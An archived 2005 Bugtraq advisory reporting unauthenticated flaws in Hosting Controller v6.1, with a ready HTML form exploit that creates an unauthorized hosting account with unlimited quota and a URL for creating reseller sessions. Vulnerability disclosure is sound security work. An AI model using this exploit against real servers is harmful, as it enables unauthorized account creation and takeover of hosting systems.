lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050711084647.8900.qmail@securityfocus.com>
Date: 11 Jul 2005 08:46:47 -0000
From: kehieuhoc@...oo.com
To: bugtraq@...urityfocus.com
Subject: Bug Hosting Controller New (v6.1 - Hotfix 2.1)


-= KeHieuHoc – HCE GROUP =-

Information
-------------------------
Software Package : Hosting Controller

Vendor Homepage : http://www.hostingcontroller.com

Platforms : Windows based servers

Vulnerability : Multiple Unauthenticated information disclose

Risk : high

Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 2.1 )

Vendor Contacted : 09/07/2005

Release Date: : 11/07/2005



Summary

------------

Hosting Controller is a complete array of Web hosting automation tools for

the Windows Server family platform.

(I)

You can create new account on Hosting Controller

Exploit :

http://[target]/admin/hosting/addsubsite_online.asp

Code Form:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM> 



(II)

 You can create any “session” which it is special for owner system

Exploit :

http://[target]/admin/hosting/dsp_newreseller.asp


(I) and (II) -> have fun 

 
 


Solution

----------



The vender was notified, they have released a patch.

Update Your software



Credits

---------

Discovered on 9 July 2005 by KeHieuHoc – HCE Group


Email: kehieuhoc@...oo.com

 

References

-------------



http://hcegroup.net

 

------------------------------ //  KeHieuHoc – HCE Group \\ ------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ